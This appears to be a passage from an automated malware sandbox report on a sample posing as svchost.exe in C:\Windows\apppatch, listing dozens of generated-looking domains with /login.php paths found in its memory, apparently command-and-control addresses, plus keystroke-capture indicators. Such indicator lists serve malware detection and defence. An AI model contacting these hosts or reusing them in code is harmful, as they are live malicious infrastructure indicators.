    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574096603.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocydyc.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocygim.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770277395.000000000734E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483592677.000000000BE83000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771679964.0000000007337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjic.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vocyjik.com/login.php
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599995293.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volymuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2574659514.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2589232221.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582651634.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypof.com/login.php
    Source: svchost.exe, 00000001.00000003.2799485935.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800682376.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794121889.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.00000000073A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2794122039.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2508663106.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2505929532.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800540178.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2791148605.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2795311050.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800431659.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypum.com/login.php
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2524978481.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809902914.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.000000000735E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2530012811.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803364591.0000000005F9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528389580.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2526234256.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrut.com/login.php
    Source: svchost.exe, 00000001.00000003.2802565524.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2518500900.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520694220.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2520541717.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2802658377.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519802844.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2519384142.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2807723394.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2803526533.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2800699213.00000000072E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzef.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979374488.0000000007200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2577145365.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837121931.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2582339927.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonydem.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
    Source: svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636466156.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2629381703.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2988300746.000000000BE53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2612043609.0000000005F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2614746889.00000000073B1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2987725524.000000000BE0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613993664.00000000073B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykam.com/login.php
    Source: svchost.exe, 00000001.00000003.2561438521.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830112848.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2830563308.000000000724E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2556143738.0000000007389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2808095561.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/http://galykiz.com/
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2810277870.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypyf.com/login.php
    Source: svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2974667610.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqof.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2484051841.000000000BE25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2474260558.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/
    Source: svchost.exe, 00000001.00000003.2815248355.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815952553.00000000072E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2815757354.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808677418.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2814479202.00000000072F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2809428252.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2808839398.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867102202.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
    Source: svchost.exe, 00000001.00000003.2809672736.0000000005F9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528463448.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2811252101.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528177769.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523070283.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2528332201.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2522775784.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2523240921.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2598474329.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
    Source: svchost.exe, 00000001.00000003.2599492010.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2595308643.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593794068.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2593784871.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopydaf.com/login.php
    Source: svchost.exe, 00000001.00000003.2573059018.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2832397817.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837727228.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2835961971.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjac.com/login.php
    Source: svchost.exe, 00000001.00000003.2536042650.00000000073DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2545206078.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535694034.00000000073DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980870910.000000000733C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613424581.000000000734D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867450379.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2613994929.000000000734F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2611837794.0000000007334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2570181006.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2574433458.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571621113.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2568700922.000000000722E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833294721.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572739262.0000000007230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqef.com/login.php
    Source: svchost.exe, 00000001.00000003.2556595086.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825246973.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2554327185.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2571760881.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2825305853.000000000721A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2536562321.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2823512755.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2572347072.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2552572021.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2824083108.000000000733B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2546077981.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2561801685.0000000007345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2535691969.0000000007345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2502330096.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483450867.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494447940.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483930965.000000000721E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770227198.000000000BE5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2771944825.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2767985121.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483798892.000000000721B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2494764466.0000000007389000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2766393169.0000000007234000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php
    Source: svchost.exe, 00000001.00000003.2479457994.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2483032039.000000000BE1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php3
    Source: svchost.exe, 00000001.00000003.2613993664.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854980925.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2621030170.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2860106956.0000000007234000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2979657667.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612600338.0000000007236000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2617522369.0000000007236000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php
    Source: svchost.exe, 00000001.00000003.2859933984.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2854943303.00000000072F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2848730732.00000000072F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2856497680.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2599492010.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837121931.000000000BE82000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2586469836.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2612044632.000000000BE0C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2839455732.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2837692038.00000000072F7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2980543727.00000000072F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybyc.com/login.php
    Source: svchost.exe, 00000001.00000003.2711276062.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770480455.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2645801459.000000000BE1D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2646317504.000000000BE0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2701886628.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1762578913.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2708292278.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771305974.00000000072A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2770976784.000000000BE1F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1771501878.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2659316703.000000000724D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2737038256.000000000BE1E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1770660444.0000000007204000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2636915993.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1762012054.000000000735E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2640990048.0000000007380000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2712067298.000000000BE1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowydef.com/login.php

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: C:\Windows\apppatch\svchost.exe Code function: [tab] 1_2_02CA2F40
    Source: C:\Windows\apppatch\svchost.exe Code function: [del] 1_2_02CA2F40
    Source: C:\Windows\apppatch\svchost.exe Code function: [ins] 1_2_02CA2F40
